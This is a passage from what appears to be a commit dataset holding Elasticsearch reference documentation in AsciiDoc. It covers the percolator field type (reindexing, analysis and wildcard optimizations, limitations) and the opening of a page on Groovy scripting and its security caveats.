configured to be 
a percolator\nfield. The percolator field type has no settings. Just configuring the `percolator`\nfield type is sufficient to instruct Elasticsearch to treat a field as a\nquery.\n\nIf the following mapping configures the `percolator` field type for the\n`query` field:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\n{\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"query\": {\n \"type\": \"percolator\"\n },\n \"field\": {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TESTSETUP\n\nThen you can index a query:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\/_doc\/match_value\n{\n \"query\" : {\n \"match\" : {\n \"field\" : \"value\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[IMPORTANT]\n=====================================\n\nFields referred to in a percolator query must *already* exist in the mapping\nassociated with the index used for percolation. In order to make sure these fields exist,\nadd or update a mapping via the <<indices-create-index,create index>> or <<indices-put-mapping,put mapping>> APIs.\nFields referred in a percolator query may exist in any type of the index containing the `percolator` field type.\n\n=====================================\n\n[float]\n==== Reindexing your percolator queries\n\nReindexing percolator queries is sometimes required to benefit from improvements made to the `percolator` field type in\nnew releases.\n\nReindexing percolator queries can be reindexed by using the <<docs-reindex,reindex api>>.\nLets take a look at the following index with a percolator field type:\n\n[source,js]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"_doc\" : {\n \"properties\": {\n \"query\" : {\n \"type\" : \"percolator\"\n },\n \"body\" : {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n\nPOST _aliases\n{\n \"actions\": [\n {\n \"add\": {\n \"index\": \"index\",\n \"alias\": \"queries\" <1>\n }\n }\n ]\n}\n\nPUT queries\/_doc\/1?refresh\n{\n \"query\" : {\n \"match\" : {\n \"body\" : \"quick brown fox\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> It is always recommended to define an alias for your index, so that in case of a reindex systems \/ applications\n don't need to be changed to know that the percolator queries are now in a different index.\n\nLets say you're going to upgrade to a new major version and in order for the new Elasticsearch version to still be able\nto read your queries you need to reindex your queries into a new index on the current Elasticsearch version:\n\n[source,js]\n--------------------------------------------------\nPUT new_index\n{\n \"mappings\": {\n \"_doc\" : {\n \"properties\": {\n \"query\" : {\n \"type\" : \"percolator\"\n },\n \"body\" : {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n\nPOST \/_reindex?refresh\n{\n \"source\": {\n \"index\": \"index\"\n },\n \"dest\": {\n \"index\": \"new_index\"\n }\n}\n\nPOST _aliases\n{\n \"actions\": [ <1>\n {\n \"remove\": {\n \"index\" : \"index\",\n \"alias\": \"queries\"\n }\n },\n {\n \"add\": {\n \"index\": \"new_index\",\n \"alias\": \"queries\"\n }\n }\n ]\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> If you have an alias don't forget to point it to the new index.\n\nExecuting the `percolate` query via the `queries` 
alias:\n\n[source,js]\n--------------------------------------------------\nGET \/queries\/_search\n{\n \"query\": {\n \"percolate\" : {\n \"field\" : \"query\",\n \"document\" : {\n \"body\" : \"fox jumps over the lazy dog\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nnow returns matches from the new index:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 3,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 5,\n \"successful\": 5,\n \"skipped\" : 0,\n \"failed\": 0\n },\n \"hits\": {\n \"total\": 1,\n \"max_score\": 0.2876821,\n \"hits\": [\n {\n \"_index\": \"new_index\", <1>\n \"_type\": \"_doc\",\n \"_id\": \"1\",\n \"_score\": 0.2876821,\n \"_source\": {\n \"query\": {\n \"match\": {\n \"body\": \"quick brown fox\"\n }\n }\n },\n \"fields\" : {\n \"_percolator_document_slot\" : [0]\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 3,\/\"took\": \"$body.took\",\/]\n\n<1> Percolator query hit is now being presented from the new index.\n\n[float]\n==== Optimizing query time text analysis\n\nWhen the percolator verifies a percolator candidate match it is going to parse, perform query time text analysis and actually run\nthe percolator query on the document being percolated. This is done for each candidate match and every time the `percolate` query executes.\nIf your query time text analysis is relatively expensive part of query parsing then text analysis can become the\ndominating factor time is being spent on when percolating. This query parsing overhead can become noticeable when the\npercolator ends up verifying many candidate percolator query matches.\n\nTo avoid the most expensive part of text analysis at percolate time. One can choose to do the expensive part of text analysis\nwhen indexing the percolator query. This requires using two different analyzers. The first analyzer actually performs\ntext analysis that needs be performed (expensive part). The second analyzer (usually whitespace) just splits the generated tokens\nthat the first analyzer has produced. Then before indexing a percolator query, the analyze api should be used to analyze the query\ntext with the more expensive analyzer. The result of the analyze api, the tokens, should be used to substitute the original query\ntext in the percolator query. It is important that the query should now be configured to override the analyzer from the mapping and\njust the second analyzer. 
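That is, the query must explicitly name the cheap pass-through analyzer so that the expensive analyzer from the mapping is not applied a second time. 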
Most text based queries support an `analyzer` option (`match`, `query_string`, `simple_query_string`).\nUsing this approach the expensive text analysis is performed once instead of many times.\n\nLets demonstrate this workflow via a simplified example.\n\nLets say we want to index the following percolator query:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {\n \"match\" : {\n \"body\" : {\n \"query\" : \"missing bicycles\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nwith these settings and mapping:\n\n[source,js]\n--------------------------------------------------\nPUT \/test_index\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"my_analyzer\" : {\n \"tokenizer\": \"standard\",\n \"filter\" : [\"lowercase\", \"porter_stem\"]\n }\n }\n }\n },\n \"mappings\": {\n \"_doc\" : {\n \"properties\": {\n \"query\" : {\n \"type\": \"percolator\"\n },\n \"body\" : {\n \"type\": \"text\",\n \"analyzer\": \"my_analyzer\" <1>\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> For the purpose of this example, this analyzer is considered expensive.\n\nFirst we need to use the analyze api to perform the text analysis prior to indexing:\n\n[source,js]\n--------------------------------------------------\nPOST \/test_index\/_analyze\n{\n \"analyzer\" : \"my_analyzer\",\n \"text\" : \"missing bicycles\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis results the following response:\n\n[source,js]\n--------------------------------------------------\n{\n \"tokens\": [\n {\n \"token\": \"miss\",\n \"start_offset\": 0,\n \"end_offset\": 7,\n \"type\": \"<ALPHANUM>\",\n \"position\": 0\n },\n {\n \"token\": \"bicycl\",\n \"start_offset\": 8,\n \"end_offset\": 16,\n \"type\": \"<ALPHANUM>\",\n \"position\": 1\n }\n ]\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\nAll the tokens in the returned order need to replace the query text in the percolator query:\n\n[source,js]\n--------------------------------------------------\nPUT \/test_index\/_doc\/1?refresh\n{\n \"query\" : {\n \"match\" : {\n \"body\" : {\n \"query\" : \"miss bicycl\",\n \"analyzer\" : \"whitespace\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> It is important to select a whitespace analyzer here, otherwise the analyzer defined in the mapping will be used,\nwhich defeats the point of using this workflow. 
Note that `whitespace` is a built-in analyzer, if a different analyzer\nneeds to be used, it needs to be configured first in the index's settings.\n\nThe analyze api prior to the indexing the percolator flow should be done for each percolator query.\n\nAt percolate time nothing changes and the `percolate` query can be defined normally:\n\n[source,js]\n--------------------------------------------------\nGET \/test_index\/_search\n{\n \"query\": {\n \"percolate\" : {\n \"field\" : \"query\",\n \"document\" : {\n \"body\" : \"Bycicles are missing\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis results in a response like this:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 6,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 5,\n \"successful\": 5,\n \"skipped\" : 0,\n \"failed\": 0\n },\n \"hits\": {\n \"total\": 1,\n \"max_score\": 0.2876821,\n \"hits\": [\n {\n \"_index\": \"test_index\",\n \"_type\": \"_doc\",\n \"_id\": \"1\",\n \"_score\": 0.2876821,\n \"_source\": {\n \"query\": {\n \"match\": {\n \"body\": {\n \"query\": \"miss bicycl\",\n \"analyzer\": \"whitespace\"\n }\n }\n }\n },\n \"fields\" : {\n \"_percolator_document_slot\" : [0]\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 6,\/\"took\": \"$body.took\",\/]\n\n[float]\n==== Optimizing wildcard queries.\n\nWildcard queries are more expensive than other queries for the percolator,\nespecially if the wildcard expressions are large.\n\nIn the case of `wildcard` queries with prefix wildcard expressions or just the `prefix` query,\nthe `edge_ngram` token filter can be used to replace these queries with regular `term`\nquery on a field where the `edge_ngram` token filter is configured.\n\nCreating an index with custom analysis settings:\n\n[source,js]\n--------------------------------------------------\nPUT my_queries1\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"wildcard_prefix\": { <1>\n \"type\": \"custom\",\n \"tokenizer\": \"standard\",\n \"filter\": [\n \"standard\",\n \"lowercase\",\n \"wildcard_edge_ngram\"\n ]\n }\n },\n \"filter\": {\n \"wildcard_edge_ngram\": { <2>\n \"type\": \"edge_ngram\",\n \"min_gram\": 1,\n \"max_gram\": 32\n }\n }\n }\n },\n \"mappings\": {\n \"query\": {\n \"properties\": {\n \"query\": {\n \"type\": \"percolator\"\n },\n \"my_field\": {\n \"type\": \"text\",\n \"fields\": {\n \"prefix\": { <3>\n \"type\": \"text\",\n \"analyzer\": \"wildcard_prefix\",\n \"search_analyzer\": \"standard\"\n }\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> The analyzer that generates the prefix tokens to be used at index time only.\n<2> Increase the `min_gram` and decrease `max_gram` settings based on your prefix search needs.\n<3> This multifield should be used to do the prefix search\n with a `term` or `match` query instead of a `prefix` or `wildcard` query.\n\n\nThen instead of indexing the following query:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\": {\n \"wildcard\": {\n \"my_field\": \"abc*\"\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nthis query below should be indexed:\n\n[source,js]\n--------------------------------------------------\nPUT \/my_queries1\/query\/1?refresh\n{\n \"query\": {\n \"term\": {\n \"my_field.prefix\": \"abc\"\n }\n 
}\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis way can handle the second query more efficiently than the first query.\n\nThe following search request will match with the previously indexed\npercolator query:\n\n[source,js]\n--------------------------------------------------\nGET \/my_queries1\/_search\n{\n \"query\": {\n \"percolate\": {\n \"field\": \"query\",\n \"document\": {\n \"my_field\": \"abcd\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 6,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 5,\n \"successful\": 5,\n \"skipped\": 0,\n \"failed\": 0\n },\n \"hits\": {\n \"total\": 1,\n \"max_score\": 0.41501677,\n \"hits\": [\n {\n \"_index\": \"my_queries1\",\n \"_type\": \"query\",\n \"_id\": \"1\",\n \"_score\": 0.41501677,\n \"_source\": {\n \"query\": {\n \"term\": {\n \"my_field.prefix\": \"abc\"\n }\n }\n },\n \"fields\": {\n \"_percolator_document_slot\": [\n 0\n ]\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 6,\/\"took\": \"$body.took\",\/]\n\nThe same technique can also be used to speed up suffix\nwildcard searches. By using the `reverse` token filter\nbefore the `edge_ngram` token filter.\n\n[source,js]\n--------------------------------------------------\nPUT my_queries2\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"wildcard_suffix\": {\n \"type\": \"custom\",\n \"tokenizer\": \"standard\",\n \"filter\": [\n \"standard\",\n \"lowercase\",\n \"reverse\",\n \"wildcard_edge_ngram\"\n ]\n },\n \"wildcard_suffix_search_time\": {\n \"type\": \"custom\",\n \"tokenizer\": \"standard\",\n \"filter\": [\n \"standard\",\n \"lowercase\",\n \"reverse\"\n ]\n }\n },\n \"filter\": {\n \"wildcard_edge_ngram\": {\n \"type\": \"edge_ngram\",\n \"min_gram\": 1,\n \"max_gram\": 32\n }\n }\n }\n },\n \"mappings\": {\n \"query\": {\n \"properties\": {\n \"query\": {\n \"type\": \"percolator\"\n },\n \"my_field\": {\n \"type\": \"text\",\n \"fields\": {\n \"suffix\": {\n \"type\": \"text\",\n \"analyzer\": \"wildcard_suffix\",\n \"search_analyzer\": \"wildcard_suffix_search_time\" <1>\n }\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> A custom analyzer is needed at search time too, because otherwise\n the query terms are not being reversed and would otherwise not match\n with the reserved suffix tokens.\n\nThen instead of indexing the following query:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\": {\n \"wildcard\": {\n \"my_field\": \"*xyz\"\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nthe following query below should be indexed:\n\n[source,js]\n--------------------------------------------------\nPUT \/my_queries2\/query\/2?refresh\n{\n \"query\": {\n \"match\": { <1>\n \"my_field.suffix\": \"xyz\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> The `match` query should be used instead of the `term` query,\n because text analysis needs to reverse the query terms.\n\nThe following search request will match with the previously indexed\npercolator query:\n\n[source,js]\n--------------------------------------------------\nGET \/my_queries2\/_search\n{\n \"query\": {\n \"percolate\": {\n \"field\": \"query\",\n \"document\": {\n 
\"my_field\": \"wxyz\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n[float]\n==== Dedicated Percolator Index\n\nPercolate queries can be added to any index. Instead of adding percolate queries to the index the data resides in,\nthese queries can also be added to a dedicated index. The advantage of this is that this dedicated percolator index\ncan have its own index settings (For example the number of primary and replica shards). If you choose to have a dedicated\npercolate index, you need to make sure that the mappings from the normal index are also available on the percolate index.\nOtherwise percolate queries can be parsed incorrectly.\n\n[float]\n==== Forcing Unmapped Fields to be Handled as Strings\n\nIn certain cases it is unknown what kind of percolator queries do get registered, and if no field mapping exists for fields\nthat are referred by percolator queries then adding a percolator query fails. This means the mapping needs to be updated\nto have the field with the appropriate settings, and then the percolator query can be added. But sometimes it is sufficient\nif all unmapped fields are handled as if these were default text fields. In those cases one can configure the\n`index.percolator.map_unmapped_fields_as_text` setting to `true` (default to `false`) and then if a field referred in\na percolator query does not exist, it will be handled as a default text field so that adding the percolator query doesn't\nfail.\n\n[float]\n==== Limitations\n\n[float]\n===== Parent\/child\n\nBecause the `percolate` query is processing one document at a time, it doesn't support queries and filters that run\nagainst child documents such as `has_child` and `has_parent`.\n\n[float]\n===== Fetching queries\n\nThere are a number of queries that fetch data via a get call during query parsing. For example the `terms` query when\nusing terms lookup, `template` query when using indexed scripts and `geo_shape` when using pre-indexed shapes. When these\nqueries are indexed by the `percolator` field type then the get call is executed once. So each time the `percolator`\nquery evaluates these queries, the fetches terms, shapes etc. as the were upon index time will be used. Important to note\nis that fetching of terms that these queries do, happens both each time the percolator query gets indexed on both primary\nand replica shards, so the terms that are actually indexed can be different between shard copies, if the source index\nchanged while indexing.\n\n[float]\n===== Script query\n\nThe script inside a `script` query can only access doc values fields. The `percolate` query indexes the provided document\ninto an in-memory index. This in-memory index doesn't support stored fields and because of that the `_source` field and\nother stored fields are not stored. This is the reason why in the `script` query the `_source` and other stored fields\naren't available.\n","old_contents":"[[percolator]]\n=== Percolator type\n\nThe `percolator` field type parses a json structure into a native query and\nstores that query, so that the <<query-dsl-percolate-query,percolate query>>\ncan use it to match provided documents.\n\nAny field that contains a json object can be configured to be a percolator\nfield. The percolator field type has no settings. 
Just configuring the `percolator`\nfield type is sufficient to instruct Elasticsearch to treat a field as a\nquery.\n\nIf the following mapping configures the `percolator` field type for the\n`query` field:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\n{\n \"mappings\": {\n \"_doc\": {\n \"properties\": {\n \"query\": {\n \"type\": \"percolator\"\n },\n \"field\": {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TESTSETUP\n\nThen you can index a query:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\/_doc\/match_value\n{\n \"query\" : {\n \"match\" : {\n \"field\" : \"value\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[IMPORTANT]\n=====================================\n\nFields referred to in a percolator query must *already* exist in the mapping\nassociated with the index used for percolation. In order to make sure these fields exist,\nadd or update a mapping via the <<indices-create-index,create index>> or <<indices-put-mapping,put mapping>> APIs.\nFields referred in a percolator query may exist in any type of the index containing the `percolator` field type.\n\n=====================================\n\n[float]\n==== Reindexing your percolator queries\n\nReindexing percolator queries is sometimes required to benefit from improvements made to the `percolator` field type in\nnew releases.\n\nReindexing percolator queries can be reindexed by using the <<docs-reindex,reindex api>>.\nLets take a look at the following index with a percolator field type:\n\n[source,js]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"_doc\" : {\n \"properties\": {\n \"query\" : {\n \"type\" : \"percolator\"\n },\n \"body\" : {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n\nPOST _aliases\n{\n \"actions\": [\n {\n \"add\": {\n \"index\": \"index\",\n \"alias\": \"queries\" <1>\n }\n }\n ]\n}\n\nPUT queries\/_doc\/1?refresh\n{\n \"query\" : {\n \"match\" : {\n \"body\" : \"quick brown fox\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> It is always recommended to define an alias for your index, so that in case of a reindex systems \/ applications\n don't need to be changed to know that the percolator queries are now in a different index.\n\nLets say you're going to upgrade to a new major version and in order for the new Elasticsearch version to still be able\nto read your queries you need to reindex your queries into a new index on the current Elasticsearch version:\n\n[source,js]\n--------------------------------------------------\nPUT new_index\n{\n \"mappings\": {\n \"_doc\" : {\n \"properties\": {\n \"query\" : {\n \"type\" : \"percolator\"\n },\n \"body\" : {\n \"type\": \"text\"\n }\n }\n }\n }\n}\n\nPOST \/_reindex?refresh\n{\n \"source\": {\n \"index\": \"index\"\n },\n \"dest\": {\n \"index\": \"new_index\"\n }\n}\n\nPOST _aliases\n{\n \"actions\": [ <1>\n {\n \"remove\": {\n \"index\" : \"index\",\n \"alias\": \"queries\"\n }\n },\n {\n \"add\": {\n \"index\": \"new_index\",\n \"alias\": \"queries\"\n }\n }\n ]\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> If you have an alias don't forget to point it to the new index.\n\nExecuting the `percolate` query via the `queries` alias:\n\n[source,js]\n--------------------------------------------------\nGET \/queries\/_search\n{\n \"query\": {\n 
\"percolate\" : {\n \"field\" : \"query\",\n \"document\" : {\n \"body\" : \"fox jumps over the lazy dog\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nnow returns matches from the new index:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 3,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 5,\n \"successful\": 5,\n \"skipped\" : 0,\n \"failed\": 0\n },\n \"hits\": {\n \"total\": 1,\n \"max_score\": 0.2876821,\n \"hits\": [\n {\n \"_index\": \"new_index\", <1>\n \"_type\": \"_doc\",\n \"_id\": \"1\",\n \"_score\": 0.2876821,\n \"_source\": {\n \"query\": {\n \"match\": {\n \"body\": \"quick brown fox\"\n }\n }\n },\n \"fields\" : {\n \"_percolator_document_slot\" : [0]\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 3,\/\"took\": \"$body.took\",\/]\n\n<1> Percolator query hit is now being presented from the new index.\n\n[float]\n==== Optimizing query time text analysis\n\nWhen the percolator verifies a percolator candidate match it is going to parse, perform query time text analysis and actually run\nthe percolator query on the document being percolated. This is done for each candidate match and every time the `percolate` query executes.\nIf your query time text analysis is relatively expensive part of query parsing then text analysis can become the\ndominating factor time is being spent on when percolating. This query parsing overhead can become noticeable when the\npercolator ends up verifying many candidate percolator query matches.\n\nTo avoid the most expensive part of text analysis at percolate time. One can choose to do the expensive part of text analysis\nwhen indexing the percolator query. This requires using two different analyzers. The first analyzer actually performs\ntext analysis that needs be performed (expensive part). The second analyzer (usually whitespace) just splits the generated tokens\nthat the first analyzer has produced. Then before indexing a percolator query, the analyze api should be used to analyze the query\ntext with the more expensive analyzer. The result of the analyze api, the tokens, should be used to substitute the original query\ntext in the percolator query. It is important that the query should now be configured to override the analyzer from the mapping and\njust the second analyzer. 
Most text based queries support an `analyzer` option (`match`, `query_string`, `simple_query_string`).\nUsing this approach the expensive text analysis is performed once instead of many times.\n\nLets demonstrate this workflow via a simplified example.\n\nLets say we want to index the following percolator query:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {\n \"match\" : {\n \"body\" : {\n \"query\" : \"missing bicycles\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\nwith these settings and mapping:\n\n[source,js]\n--------------------------------------------------\nPUT \/test_index\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"my_analyzer\" : {\n \"tokenizer\": \"standard\",\n \"filter\" : [\"lowercase\", \"porter_stem\"]\n }\n }\n }\n },\n \"mappings\": {\n \"_doc\" : {\n \"properties\": {\n \"query\" : {\n \"type\": \"percolator\"\n },\n \"body\" : {\n \"type\": \"text\",\n \"analyzer\": \"my_analyzer\" <1>\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> For the purpose of this example, this analyzer is considered expensive.\n\nFirst we need to use the analyze api to perform the text analysis prior to indexing:\n\n[source,js]\n--------------------------------------------------\nPOST \/test_index\/_analyze\n{\n \"analyzer\" : \"my_analyzer\",\n \"text\" : \"missing bicycles\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis results the following response:\n\n[source,js]\n--------------------------------------------------\n{\n \"tokens\": [\n {\n \"token\": \"miss\",\n \"start_offset\": 0,\n \"end_offset\": 7,\n \"type\": \"<ALPHANUM>\",\n \"position\": 0\n },\n {\n \"token\": \"bicycl\",\n \"start_offset\": 8,\n \"end_offset\": 16,\n \"type\": \"<ALPHANUM>\",\n \"position\": 1\n }\n ]\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\nAll the tokens in the returned order need to replace the query text in the percolator query:\n\n[source,js]\n--------------------------------------------------\nPUT \/test_index\/_doc\/1?refresh\n{\n \"query\" : {\n \"match\" : {\n \"body\" : {\n \"query\" : \"miss bicycl\",\n \"analyzer\" : \"whitespace\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n<1> It is important to select a whitespace analyzer here, otherwise the analyzer defined in the mapping will be used,\nwhich defeats the point of using this workflow. 
Note that `whitespace` is a built-in analyzer, if a different analyzer\nneeds to be used, it needs to be configured first in the index's settings.\n\nThe analyze api prior to the indexing the percolator flow should be done for each percolator query.\n\nAt percolate time nothing changes and the `percolate` query can be defined normally:\n\n[source,js]\n--------------------------------------------------\nGET \/test_index\/_search\n{\n \"query\": {\n \"percolate\" : {\n \"field\" : \"query\",\n \"document\" : {\n \"body\" : \"Bycicles are missing\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis results in a response like this:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\": 6,\n \"timed_out\": false,\n \"_shards\": {\n \"total\": 5,\n \"successful\": 5,\n \"skipped\" : 0,\n \"failed\": 0\n },\n \"hits\": {\n \"total\": 1,\n \"max_score\": 0.2876821,\n \"hits\": [\n {\n \"_index\": \"test_index\",\n \"_type\": \"_doc\",\n \"_id\": \"1\",\n \"_score\": 0.2876821,\n \"_source\": {\n \"query\": {\n \"match\": {\n \"body\": {\n \"query\": \"miss bicycl\",\n \"analyzer\": \"whitespace\"\n }\n }\n }\n },\n \"fields\" : {\n \"_percolator_document_slot\" : [0]\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\": 6,\/\"took\": \"$body.took\",\/]\n\n[float]\n==== Dedicated Percolator Index\n\nPercolate queries can be added to any index. Instead of adding percolate queries to the index the data resides in,\nthese queries can also be added to a dedicated index. The advantage of this is that this dedicated percolator index\ncan have its own index settings (For example the number of primary and replica shards). If you choose to have a dedicated\npercolate index, you need to make sure that the mappings from the normal index are also available on the percolate index.\nOtherwise percolate queries can be parsed incorrectly.\n\n[float]\n==== Forcing Unmapped Fields to be Handled as Strings\n\nIn certain cases it is unknown what kind of percolator queries do get registered, and if no field mapping exists for fields\nthat are referred by percolator queries then adding a percolator query fails. This means the mapping needs to be updated\nto have the field with the appropriate settings, and then the percolator query can be added. But sometimes it is sufficient\nif all unmapped fields are handled as if these were default text fields. In those cases one can configure the\n`index.percolator.map_unmapped_fields_as_text` setting to `true` (default to `false`) and then if a field referred in\na percolator query does not exist, it will be handled as a default text field so that adding the percolator query doesn't\nfail.\n\n[float]\n==== Limitations\n\n[float]\n===== Parent\/child\n\nBecause the `percolate` query is processing one document at a time, it doesn't support queries and filters that run\nagainst child documents such as `has_child` and `has_parent`.\n\n[float]\n===== Fetching queries\n\nThere are a number of queries that fetch data via a get call during query parsing. For example the `terms` query when\nusing terms lookup, `template` query when using indexed scripts and `geo_shape` when using pre-indexed shapes. When these\nqueries are indexed by the `percolator` field type then the get call is executed once. So each time the `percolator`\nquery evaluates these queries, the fetches terms, shapes etc. as the were upon index time will be used. 
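For example (a sketch; the lookup index, type, id and path here are assumed), a percolator query using terms lookup captures the looked-up terms once, when the query itself is indexed:\n\n[source,js]\n--------------------------------------------------\n{\n  \"query\": {\n    \"terms\": {\n      \"user\": {\n        \"index\": \"users\",\n        \"type\": \"_doc\",\n        \"id\": \"blocked\",\n        \"path\": \"blocked_users\"\n      }\n    }\n  }\n}\n--------------------------------------------------\n\/\/ NOTCONSOLE\n\n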
\n\n[float]\n==== Limitations\n\n[float]\n===== Parent\/child\n\nBecause the `percolate` query is processing one document at a time, it doesn't support queries and filters that run\nagainst child documents such as `has_child` and `has_parent`.\n\n[float]\n===== Fetching queries\n\nThere are a number of queries that fetch data via a get call during query parsing. For example, the `terms` query when\nusing terms lookup, the `template` query when using indexed scripts, and `geo_shape` when using pre-indexed shapes. When these\nqueries are indexed by the `percolator` field type, the get call is executed once. So each time the `percolator`\nquery evaluates these queries, the terms, shapes, and so on, as they were fetched at index time, will be used. Note\nthat the fetching these queries perform happens each time the percolator query gets indexed, on both primary\nand replica shards, so the terms that are actually indexed can be different between shard copies, if the source index\nchanged while indexing.\n\n[float]\n===== Script query\n\nThe script inside a `script` query can only access doc values fields. The `percolate` query indexes the provided document\ninto an in-memory index. This in-memory index doesn't support stored fields and because of that the `_source` field and\nother stored fields are not stored. This is the reason why in the `script` query the `_source` and other stored fields\naren't available.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"414625979146cadac413dfa6c81150c0d0f7b061","subject":"Groovy is no longer the default scripting language","message":"Groovy is no longer the default scripting language\n\nCloses #21208","repos":"strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc","old_file":"docs\/reference\/modules\/scripting\/groovy.asciidoc","new_file":"docs\/reference\/modules\/scripting\/groovy.asciidoc","new_contents":"[[modules-scripting-groovy]]\n=== Groovy Scripting Language\n\ndeprecated[5.0.0,Groovy will be replaced by the new scripting language <<modules-scripting-painless, `Painless`>>]\n\nGroovy is available in Elasticsearch by default. Although\nlimited by the <<java-security-manager,Java Security Manager>>, it is not a\nsandboxed language and only `file` scripts may be used by default.\n\nEnabling `inline` or `stored` Groovy scripting is a security risk and should\nonly be considered if your Elasticsearch cluster is protected from the outside\nworld. Even a simple `while (true) { }` loop could behave as a\ndenial-of-service attack on your cluster.\n\nSee <<modules-scripting-security, Scripting and Security>> for details\non security issues with scripts, including how to customize class\nwhitelisting.\n\n[float]\n=== Doc value properties and methods\n\nDoc values in Groovy support the following properties and methods (depending\non the underlying field type):\n\n`doc['field_name'].value`::\n The native value of the field. For example, if it's a short type, it will be short.\n\n`doc['field_name'].values`::\n The native array values of the field. For example, if it's a short type,\n it will be short[]. Remember, a field can have several values within a\n single doc.
